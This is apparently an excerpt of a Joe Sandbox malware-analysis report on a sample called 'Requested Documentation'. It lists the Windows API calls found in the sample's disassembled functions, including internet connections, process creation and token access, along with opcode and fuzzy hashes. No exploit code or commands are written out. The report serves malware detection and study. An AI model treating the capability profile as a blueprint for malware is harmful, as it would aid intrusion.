                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009F17A3
                                                                                • Part of subcall function 009F182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009F184C
                                                                                • Part of subcall function 009F182D: InternetCloseHandle.WININET(00000000), ref: 009F18E9
                                                                              Similarity
                                                                              • API ID: Internet$CloseConnectHandleOpen
                                                                              • String ID:
                                                                              APIs
                                                                              • GetFileAttributesW.KERNEL32(?,00A0FAC0), ref: 009E3A64
                                                                              • GetLastError.KERNEL32 ref: 009E3A73
                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 009E3A82
                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A0FAC0), ref: 009E3ADF
                                                                              Similarity
                                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                                              • String ID:
                                                                              APIs
                                                                                • Part of subcall function 009DF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,009DDCD3,?,?,?,009DEAC6,00000000,000000EF,00000119,?,?), ref: 009DF0CB
                                                                                • Part of subcall function 009DF0BC: lstrcpyW.KERNEL32(00000000,?,?,009DDCD3,?,?,?,009DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 009DF0F1
                                                                                • Part of subcall function 009DF0BC: lstrcmpiW.KERNEL32(00000000,?,009DDCD3,?,?,?,009DEAC6,00000000,000000EF,00000119,?,?), ref: 009DF122
                                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,009DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 009DDCEC
                                                                              • lstrcpyW.KERNEL32(00000000,?,?,009DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 009DDD12
                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,009DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 009DDD46
                                                                              Similarity
                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                              • String ID: cdecl
                                                                              APIs
                                                                              • _free.LIBCMT ref: 009B5101
                                                                                • Part of subcall function 009A571C: __FF_MSGBANNER.LIBCMT ref: 009A5733
                                                                                • Part of subcall function 009A571C: __NMSG_WRITE.LIBCMT ref: 009A573A
                                                                                • Part of subcall function 009A571C: RtlAllocateHeap.NTDLL(01340000,00000000,00000001,00000000,?,?,?,009A0DD3,?), ref: 009A575F
                                                                              Similarity
                                                                              • API ID: AllocateHeap_free
                                                                              • String ID:
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009844CF
                                                                                • Part of subcall function 0098407C: _memset.LIBCMT ref: 009840FC
                                                                                • Part of subcall function 0098407C: _wcscpy.LIBCMT ref: 00984150
                                                                                • Part of subcall function 0098407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00984160
                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00984524
                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00984533
                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009BD4B9
                                                                              Similarity
                                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                              • String ID:
                                                                              APIs
                                                                                • Part of subcall function 00985A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,009E7896,?,?,00000000), ref: 00985A2C
                                                                                • Part of subcall function 00985A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,009E7896,?,?,00000000,?,?), ref: 00985A50
                                                                              • gethostbyname.WSOCK32(?,?,?), ref: 009F6399
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 009F63A4
                                                                              • _memmove.LIBCMT ref: 009F63D1
                                                                              • inet_ntoa.WSOCK32(?), ref: 009F63DC
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                              • String ID:
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 009D8B61
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009D8B73
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009D8B89
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009D8BA4
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              APIs
                                                                                • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                                                                              • DefDlgProcW.USER32(?,00000020,?), ref: 009812D8
                                                                              • GetClientRect.USER32(?,?), ref: 009BB5FB
                                                                              • GetCursorPos.USER32(?), ref: 009BB605
                                                                              • ScreenToClient.USER32(?,?), ref: 009BB610
                                                                              Similarity
                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                              • String ID:
                                                                              APIs
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009DFCED,?,009E0D40,?,00008000), ref: 009E115F
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,009DFCED,?,009E0D40,?,00008000), ref: 009E1184
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009DFCED,?,009E0D40,?,00008000), ref: 009E118E
                                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,009DFCED,?,009E0D40,?,00008000), ref: 009E11C1
                                                                              Similarity
                                                                              • API ID: CounterPerformanceQuerySleep
                                                                              • String ID:
                                                                              • API String ID: 2875609808-0
                                                                              • Opcode ID: 35d9fa5b8424743516c1fe016eea3a415338537827c8f71bdace7f74a8be3c16
                                                                              • Instruction ID: 6e9cb8b7124ab5cd910b3f246077d3233e788bd4b744da73885b0af5572445a3
                                                                              • Opcode Fuzzy Hash: 35d9fa5b8424743516c1fe016eea3a415338537827c8f71bdace7f74a8be3c16
                                                                              • Instruction Fuzzy Hash: 2B114831C0465DEBCF05DFE6D888AEEBB78FB09711F004555EA45B2240CB7099518BD1
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 009DD84D
                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009DD864
                                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009DD879
                                                                              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 009DD897
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Type$Register$FileLoadModuleNameUser
                                                                              • String ID:
                                                                              • API String ID: 1352324309-0
                                                                              • Opcode ID: adc1f20931c121e541466aa35885f8cbd196d222fc0fa0bb879f987756aa520d
                                                                              • Instruction ID: 7fd32b1755433696e023a5296654f34b1d4cdcbdb37fa42a4c1e1212d2776197
                                                                              • Opcode Fuzzy Hash: adc1f20931c121e541466aa35885f8cbd196d222fc0fa0bb879f987756aa520d
                                                                              • Instruction Fuzzy Hash: 6C116575646308DFE331CF94DC48F93BBBCEB00700F10896AA915D6550D7B5E546EBA1
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                              • String ID:
                                                                              • API String ID: 3016257755-0
                                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                              • Instruction ID: 1a11424568091cfec1c0c9b6414b1e0fd5e40868293d1d6befb264a9a9386512
                                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                              • Instruction Fuzzy Hash: 02017E3204814EBBCF126EC4CD01CED7F66BB98360F498616FA1868030C236C9B1AB91
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 00A0B2E4
                                                                              • ScreenToClient.USER32(?,?), ref: 00A0B2FC
                                                                              • ScreenToClient.USER32(?,?), ref: 00A0B320
                                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A0B33B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                              • String ID:
                                                                              • API String ID: 357397906-0
                                                                              • Opcode ID: 13014001c97a64173334ccacddc3096b7c71f2766e287ff7b3ef107994e71587
                                                                              • Instruction ID: 62fa0eee2c9c334792b84a67f4ac87e4048ed4c798fe247a38bb332b3ef1faae
                                                                              • Opcode Fuzzy Hash: 13014001c97a64173334ccacddc3096b7c71f2766e287ff7b3ef107994e71587
                                                                              • Instruction Fuzzy Hash: 8D1163B9D0024DEFDB11CFA9D8849EEBBB9FB08310F108166E914E3620D735AA518F51
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00A0B644
                                                                              • _memset.LIBCMT ref: 00A0B653
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00A46F20,00A46F64), ref: 00A0B682
                                                                              • CloseHandle.KERNEL32 ref: 00A0B694
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                              • String ID:
                                                                              • API String ID: 3277943733-0
                                                                              • Opcode ID: 360af1d800f87d822886b67d25a329e1eec5234918932587bffd1b353807907d
                                                                              • Instruction ID: efe730257e494b2adfe2a56f58836e14b600d5935a5422216837e2d914a41d95
                                                                              • Opcode Fuzzy Hash: 360af1d800f87d822886b67d25a329e1eec5234918932587bffd1b353807907d
                                                                              • Instruction Fuzzy Hash: 1CF054B95403047FE21067A57C05F7B3A5CEB47755F004020BA48E9592D7774C0687AA
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 009E6BE6
                                                                                • Part of subcall function 009E76C4: _memset.LIBCMT ref: 009E76F9
                                                                              • _memmove.LIBCMT ref: 009E6C09
                                                                              • _memset.LIBCMT ref: 009E6C16
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 009E6C26
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                              • String ID:
                                                                              • API String ID: 48991266-0
                                                                              • Opcode ID: ea2a1482d5ab716ca7f73980f98199b968361b57ac0a8bec7f062ac0c93c7a38
                                                                              • Instruction ID: c5d5c15d2ca902f306ea9837692a2f3923ea8f7836cec8ac97108e83b6596728
                                                                              • Opcode Fuzzy Hash: ea2a1482d5ab716ca7f73980f98199b968361b57ac0a8bec7f062ac0c93c7a38
                                                                              • Instruction Fuzzy Hash: 84F05B3A1001046BCF016F95DC85B86BB25EF85324F048061FD085E157C732D812DBB5
                                                                              APIs
                                                                              • GetSysColor.USER32(00000008), ref: 00982231
                                                                              • SetTextColor.GDI32(?,000000FF), ref: 0098223B
                                                                              • SetBkMode.GDI32(?,00000001), ref: 00982250
                                                                              • GetStockObject.GDI32(00000005), ref: 00982258
                                                                              • GetWindowDC.USER32(?,00000000), ref: 009BBE83
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 009BBE90
                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 009BBEA9
                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 009BBEC2
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 009BBEE2
                                                                              • ReleaseDC.USER32(?,00000000), ref: 009BBEED
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                              • String ID:
                                                                              • API String ID: 1946975507-0
                                                                              • Opcode ID: d5a974c30eaec418828999e35400bce1c3731f84b63b84ca9c24af5c72f72cf2
                                                                              • Instruction ID: 83f0fbb281a0301fdc0d9e4940a60351ce009cc5eab552f641ccba5a506df18b
                                                                              • Opcode Fuzzy Hash: d5a974c30eaec418828999e35400bce1c3731f84b63b84ca9c24af5c72f72cf2
                                                                              • Instruction Fuzzy Hash: 78E03932104248AEDF219FA4EC0D7D83B14EB05332F008366FB69680E187B14992DB12
                                                                              APIs
                                                                              • GetCurrentThread.KERNEL32 ref: 009D871B
                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,009D82E6), ref: 009D8722
                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009D82E6), ref: 009D872F
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,009D82E6), ref: 009D8736
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                              • String ID:
                                                                              • API String ID: 3974789173-0
                                                                              • Opcode ID: 55d39ca1f2a4b20607fe4cd5b08764a8a52564bc8374b7faf3f4b7e82e532c30
                                                                              • Instruction ID: 30e48e760e8bd4d2205f5a34404feebe970e6fd23ba4e76d3f323ee0de869a8f
                                                                              • Opcode Fuzzy Hash: 55d39ca1f2a4b20607fe4cd5b08764a8a52564bc8374b7faf3f4b7e82e532c30
                                                                              • Instruction Fuzzy Hash: E8E086366512159FD7309FF45D0CB9B3BACEF54791F148828B645EA041EA348443C750
                                                                              APIs
                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 009DB4BE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ContainedObject
                                                                              • String ID: AutoIt3GUI$Container
                                                                              • API String ID: 3565006973-3941886329
                                                                              • Opcode ID: e1299ff0a044427d47a483a8c4e1e0617814de23829a90da78f2001f78ab56cf
                                                                              • Instruction ID: c613417d08890c5533d0cf8db5ccbbc83279177aab5ad6d9cd4721b09b579b9e
                                                                              • Opcode Fuzzy Hash: e1299ff0a044427d47a483a8c4e1e0617814de23829a90da78f2001f78ab56cf
                                                                              • Instruction Fuzzy Hash: 8A912770640601EFDB14DF64C884B6AB7E9FF49710F21856EF94A8B3A1DB70E841CB50
                                                                              APIs
                                                                                • Part of subcall function 0099FC86: _wcscpy.LIBCMT ref: 0099FCA9
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                              • __wcsnicmp.LIBCMT ref: 009EB02D
                                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 009EB0F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                              • String ID: LPT
                                                                              • API String ID: 3222508074-1350329615
                                                                              • Opcode ID: dfa6be7ef6413b625e1c80382d1d907d0e1e3c162433d66983eb527094116bab
                                                                              • Instruction ID: af74e475dfbf55f99642a8117902be157e998f780e4e277f79a5c7ce51953320
                                                                              • Opcode Fuzzy Hash: dfa6be7ef6413b625e1c80382d1d907d0e1e3c162433d66983eb527094116bab
                                                                              • Instruction Fuzzy Hash: 8F619071A04219AFCB15EF99C891EBFB7B8EF48310F144069F916AB391D730AE44CB90
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 00992968
                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00992981
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemorySleepStatus
                                                                              • String ID: @
                                                                              • API String ID: 2783356886-2766056989
                                                                              • Opcode ID: 392f118c16f1a64b2e050858113462e3349091de8d15ad63c203b37d3c098f2d
                                                                              • Instruction ID: 4ab09f4b907352f049df01940d84c8604c31712ef8db69e13532d7d81a9c91e1
                                                                              • Opcode Fuzzy Hash: 392f118c16f1a64b2e050858113462e3349091de8d15ad63c203b37d3c098f2d
                                                                              • Instruction Fuzzy Hash: A55147714087449BD320EF54D886BAFBBE8FBC5344F81885DF2D9411A1DB30856ACB66
                                                                              APIs
                                                                                • Part of subcall function 00984F0B: __fread_nolock.LIBCMT ref: 00984F29
                                                                              • _wcscmp.LIBCMT ref: 009E9824
                                                                              • _wcscmp.LIBCMT ref: 009E9837
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscmp$__fread_nolock
                                                                              • String ID: FILE
                                                                              • API String ID: 4029003684-3121273764
                                                                              • Opcode ID: 119c821da52bec2286c5c76ba64a3c157f5960661ae5cc885fd5b3ad82321f34
                                                                              • Instruction ID: cc5ce72e8f0bce7ade5b5b3a0120fc05a2410b8675aeaed6543ed79486aa6e24
                                                                              • Opcode Fuzzy Hash: 119c821da52bec2286c5c76ba64a3c157f5960661ae5cc885fd5b3ad82321f34
                                                                              • Instruction Fuzzy Hash: 9341D971A0424ABADF21ABA5CC45FEFB7BDDF86710F004469FA04E7181D7719D048BA1
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009F259E
                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009F25D4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CrackInternet_memset
                                                                              • String ID: |
                                                                              • API String ID: 1413715105-2343686810
                                                                              • Opcode ID: 0393e5ad73a795f9aadcb45a656d215abefa702ea9a1ea033fb10ffd4653f0d9
                                                                              • Instruction ID: 0f13c550f9483db0f41286bc60cb619971cfdcf09c47051050ce68354d82906f
                                                                              • Opcode Fuzzy Hash: 0393e5ad73a795f9aadcb45a656d215abefa702ea9a1ea033fb10ffd4653f0d9
                                                                              • Instruction Fuzzy Hash: D4311B71804119EBCF11EFA4CC85EEEBFB8FF48310F10006AF915A6262EB359956DB60
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00A07B61
                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A07B76
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: '
                                                                              • API String ID: 3850602802-1997036262
                                                                              • Opcode ID: 04e964c63d75ecb68e55210ace6f30a0de0e505762cdd3dfb7bf862bdd03cfc4
                                                                              • Instruction ID: a38146571ff81c0340e434a196ac27d743e6c7e2b6f66b19b29da69335563c84
                                                                              • Opcode Fuzzy Hash: 04e964c63d75ecb68e55210ace6f30a0de0e505762cdd3dfb7bf862bdd03cfc4
                                                                              • Instruction Fuzzy Hash: 8541E674E0520E9FDB14CF68D981BEEBBB5FB09340F10416AE905AB391D771A952CFA0
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 00A06B17
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A06B53
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$DestroyMove
                                                                              • String ID: static
                                                                              • API String ID: 2139405536-2160076837
